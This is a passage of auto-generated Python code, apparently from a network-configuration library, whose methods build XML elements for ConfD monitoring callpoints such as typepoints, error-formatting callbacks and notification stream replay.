callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_notification_subscription_registration_type_range_path(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_notification_subscription = ET.SubElement(callpoints, "snmp-notification-subscription")
id_key = ET.SubElement(snmp_notification_subscription, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(snmp_notification_subscription, "registration-type")
range = ET.SubElement(registration_type, "range")
path = ET.SubElement(range, "path")
path.text = kwargs.pop('path')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_notification_subscription_registration_type_range_range_lower(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_notification_subscription = ET.SubElement(callpoints, "snmp-notification-subscription")
id_key = ET.SubElement(snmp_notification_subscription, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(snmp_notification_subscription, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
lower = ET.SubElement(range, "lower")
lower.text = kwargs.pop('lower')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_notification_subscription_registration_type_range_range_upper(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_notification_subscription = ET.SubElement(callpoints, "snmp-notification-subscription")
id_key = ET.SubElement(snmp_notification_subscription, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(snmp_notification_subscription, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
upper = ET.SubElement(range, "upper")
upper.text = kwargs.pop('upper')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_notification_subscription_registration_type_range_range_default(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_notification_subscription = ET.SubElement(callpoints, "snmp-notification-subscription")
id_key = ET.SubElement(snmp_notification_subscription, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(snmp_notification_subscription, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
default = ET.SubElement(range, "default")
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_notification_subscription_registration_type_range_range_daemon_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_notification_subscription = ET.SubElement(callpoints, "snmp-notification-subscription")
id_key = ET.SubElement(snmp_notification_subscription, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(snmp_notification_subscription, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
id = ET.SubElement(daemon, "id")
id.text = kwargs.pop('id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_notification_subscription_registration_type_range_range_daemon_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_notification_subscription = ET.SubElement(callpoints, "snmp-notification-subscription")
id_key = ET.SubElement(snmp_notification_subscription, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(snmp_notification_subscription, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
name = ET.SubElement(daemon, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_notification_subscription_registration_type_range_range_daemon_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_notification_subscription = ET.SubElement(callpoints, "snmp-notification-subscription")
id_key = ET.SubElement(snmp_notification_subscription, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(snmp_notification_subscription, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
error = ET.SubElement(daemon, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_notification_subscription_registration_type_file_file(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_notification_subscription = ET.SubElement(callpoints, "snmp-notification-subscription")
id_key = ET.SubElement(snmp_notification_subscription, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(snmp_notification_subscription, "registration-type")
file = ET.SubElement(registration_type, "file")
file = ET.SubElement(file, "file")
file.text = kwargs.pop('file')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_notification_subscription_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_notification_subscription = ET.SubElement(callpoints, "snmp-notification-subscription")
id_key = ET.SubElement(snmp_notification_subscription, "id")
id_key.text = kwargs.pop('id')
error = ET.SubElement(snmp_notification_subscription, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_error_formatting_callback_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
error_formatting_callback = ET.SubElement(callpoints, "error-formatting-callback")
id = ET.SubElement(error_formatting_callback, "id")
id.text = kwargs.pop('id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_error_formatting_callback_registration_type_daemon_daemon_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
error_formatting_callback = ET.SubElement(callpoints, "error-formatting-callback")
id_key = ET.SubElement(error_formatting_callback, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(error_formatting_callback, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
id = ET.SubElement(daemon, "id")
id.text = kwargs.pop('id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_error_formatting_callback_registration_type_daemon_daemon_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
error_formatting_callback = ET.SubElement(callpoints, "error-formatting-callback")
id_key = ET.SubElement(error_formatting_callback, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(error_formatting_callback, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
name = ET.SubElement(daemon, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_error_formatting_callback_registration_type_daemon_daemon_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
error_formatting_callback = ET.SubElement(callpoints, "error-formatting-callback")
id_key = ET.SubElement(error_formatting_callback, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(error_formatting_callback, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
error = ET.SubElement(daemon, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_error_formatting_callback_registration_type_range_path(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
error_formatting_callback = ET.SubElement(callpoints, "error-formatting-callback")
id_key = ET.SubElement(error_formatting_callback, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(error_formatting_callback, "registration-type")
range = ET.SubElement(registration_type, "range")
path = ET.SubElement(range, "path")
path.text = kwargs.pop('path')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_error_formatting_callback_registration_type_range_range_lower(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
error_formatting_callback = ET.SubElement(callpoints, "error-formatting-callback")
id_key = ET.SubElement(error_formatting_callback, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(error_formatting_callback, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
lower = ET.SubElement(range, "lower")
lower.text = kwargs.pop('lower')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_error_formatting_callback_registration_type_range_range_upper(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
error_formatting_callback = ET.SubElement(callpoints, "error-formatting-callback")
id_key = ET.SubElement(error_formatting_callback, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(error_formatting_callback, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
upper = ET.SubElement(range, "upper")
upper.text = kwargs.pop('upper')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_error_formatting_callback_registration_type_range_range_default(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
error_formatting_callback = ET.SubElement(callpoints, "error-formatting-callback")
id_key = ET.SubElement(error_formatting_callback, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(error_formatting_callback, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
default = ET.SubElement(range, "default")
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_error_formatting_callback_registration_type_range_range_daemon_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
error_formatting_callback = ET.SubElement(callpoints, "error-formatting-callback")
id_key = ET.SubElement(error_formatting_callback, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(error_formatting_callback, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
id = ET.SubElement(daemon, "id")
id.text = kwargs.pop('id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_error_formatting_callback_registration_type_range_range_daemon_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
error_formatting_callback = ET.SubElement(callpoints, "error-formatting-callback")
id_key = ET.SubElement(error_formatting_callback, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(error_formatting_callback, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
name = ET.SubElement(daemon, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_error_formatting_callback_registration_type_range_range_daemon_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
error_formatting_callback = ET.SubElement(callpoints, "error-formatting-callback")
id_key = ET.SubElement(error_formatting_callback, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(error_formatting_callback, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
error = ET.SubElement(daemon, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_error_formatting_callback_registration_type_file_file(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
error_formatting_callback = ET.SubElement(callpoints, "error-formatting-callback")
id_key = ET.SubElement(error_formatting_callback, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(error_formatting_callback, "registration-type")
file = ET.SubElement(registration_type, "file")
file = ET.SubElement(file, "file")
file.text = kwargs.pop('file')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_error_formatting_callback_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
error_formatting_callback = ET.SubElement(callpoints, "error-formatting-callback")
id_key = ET.SubElement(error_formatting_callback, "id")
id_key.text = kwargs.pop('id')
error = ET.SubElement(error_formatting_callback, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_typepoint_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
typepoint = ET.SubElement(callpoints, "typepoint")
id = ET.SubElement(typepoint, "id")
id.text = kwargs.pop('id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_typepoint_registration_type_daemon_daemon_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
typepoint = ET.SubElement(callpoints, "typepoint")
id_key = ET.SubElement(typepoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(typepoint, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
id = ET.SubElement(daemon, "id")
id.text = kwargs.pop('id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_typepoint_registration_type_daemon_daemon_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
typepoint = ET.SubElement(callpoints, "typepoint")
id_key = ET.SubElement(typepoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(typepoint, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
name = ET.SubElement(daemon, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_typepoint_registration_type_daemon_daemon_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
typepoint = ET.SubElement(callpoints, "typepoint")
id_key = ET.SubElement(typepoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(typepoint, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
error = ET.SubElement(daemon, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_typepoint_registration_type_range_path(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
typepoint = ET.SubElement(callpoints, "typepoint")
id_key = ET.SubElement(typepoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(typepoint, "registration-type")
range = ET.SubElement(registration_type, "range")
path = ET.SubElement(range, "path")
path.text = kwargs.pop('path')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_typepoint_registration_type_range_range_lower(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
typepoint = ET.SubElement(callpoints, "typepoint")
id_key = ET.SubElement(typepoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(typepoint, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
lower = ET.SubElement(range, "lower")
lower.text = kwargs.pop('lower')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_typepoint_registration_type_range_range_upper(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
typepoint = ET.SubElement(callpoints, "typepoint")
id_key = ET.SubElement(typepoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(typepoint, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
upper = ET.SubElement(range, "upper")
upper.text = kwargs.pop('upper')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_typepoint_registration_type_range_range_default(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
typepoint = ET.SubElement(callpoints, "typepoint")
id_key = ET.SubElement(typepoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(typepoint, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
default = ET.SubElement(range, "default")
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_typepoint_registration_type_range_range_daemon_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
typepoint = ET.SubElement(callpoints, "typepoint")
id_key = ET.SubElement(typepoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(typepoint, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
id = ET.SubElement(daemon, "id")
id.text = kwargs.pop('id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_typepoint_registration_type_range_range_daemon_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
typepoint = ET.SubElement(callpoints, "typepoint")
id_key = ET.SubElement(typepoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(typepoint, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
name = ET.SubElement(daemon, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_typepoint_registration_type_range_range_daemon_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
typepoint = ET.SubElement(callpoints, "typepoint")
id_key = ET.SubElement(typepoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(typepoint, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
error = ET.SubElement(daemon, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_typepoint_registration_type_file_file(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
typepoint = ET.SubElement(callpoints, "typepoint")
id_key = ET.SubElement(typepoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(typepoint, "registration-type")
file = ET.SubElement(registration_type, "file")
file = ET.SubElement(file, "file")
file.text = kwargs.pop('file')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_typepoint_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
typepoint = ET.SubElement(callpoints, "typepoint")
id_key = ET.SubElement(typepoint, "id")
id_key.text = kwargs.pop('id')
error = ET.SubElement(typepoint, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_notification_stream_replay_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
notification_stream_replay = ET.SubElement(callpoints, "notification-stream-replay")
name = ET.SubElement(notification_stream_replay, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_notification_stream_replay_replay_support(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
notification_stream_replay = ET.SubElement(callpoints, "notification-stream-replay")
name_key = ET.SubElement(notification_stream_replay, "name")
name_key.text = kwargs.pop('name')
replay_support = ET.SubElement(notification_stream_replay, "replay-support")
replay_support.text = kwargs.pop('replay_support')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_notification_stream_replay_registration_type_daemon_daemon_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
notification_stream_replay = ET.SubElement(callpoints, "notification-stream-replay")
name_key = ET.SubElement(notification_stream_replay, "name")
name_key.text = kwargs.pop('name')
registration_type = ET.SubElement(notification_stream_replay, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
id = ET.SubElement(daemon, "id")
id.text = kwargs.pop('id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_notification_stream_replay_registration_type_daemon_daemon_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
notification_stream_replay = ET.SubElement(callpoints, "notification-stream-replay")
name_key = ET.SubElement(notification_stream_replay, "name")
name_key.text = kwargs.pop('name')
registration_type = ET.SubElement(notification_stream_replay, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
name = ET.SubElement(daemon, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_notification_stream_replay_registration_type_daemon_daemon_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
notification_stream_replay = ET.SubElement(callpoints, "notification-stream-replay")
name_key = ET.SubElement(notification_stream_replay, "name")
name_key.text = kwargs.pop('name')
registration_type = ET.SubElement(notification_stream_replay, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
error = ET.SubElement(daemon, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_notification_stream_replay_registration_type_range_path(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
notification_stream_replay = ET.SubElement(callpoints, "notification-stream-replay")
name_key = ET.SubElement(notification_stream_replay, "name")
name_key.text = kwargs.pop('name')
registration_type = ET.SubElement(notification_stream_replay, "registration-type")
range = ET.SubElement(registration_type, "range")
path = ET.SubElement(range, "path")
path.text = kwargs.pop('path')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_notification_stream_replay_registration_type_range_range_lower(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
notification_stream_replay = ET.SubElement(callpoints, "notification-stream-replay")
name_key = ET.SubElement(notification_stream_replay, "name")
name_key.text = kwargs.pop('name')
registration_type = ET.SubElement(notification_stream_replay, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
lower = ET.SubElement(range, "lower")
lower.text = kwargs.pop('lower')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_notification_stream_replay_registration_type_range_range_upper(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
notification_stream_replay = ET.SubElement(callpoints, "notification-stream-replay")
name_key = ET.SubElement(notification_stream_replay, "name")
name_key.text = kwargs.pop('name')
registration_type = ET.SubElement(notification_stream_replay, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
upper = ET.SubElement(range, "upper")
upper.text = kwargs.pop('upper')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_notification_stream_replay_registration_type_range_range_default(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
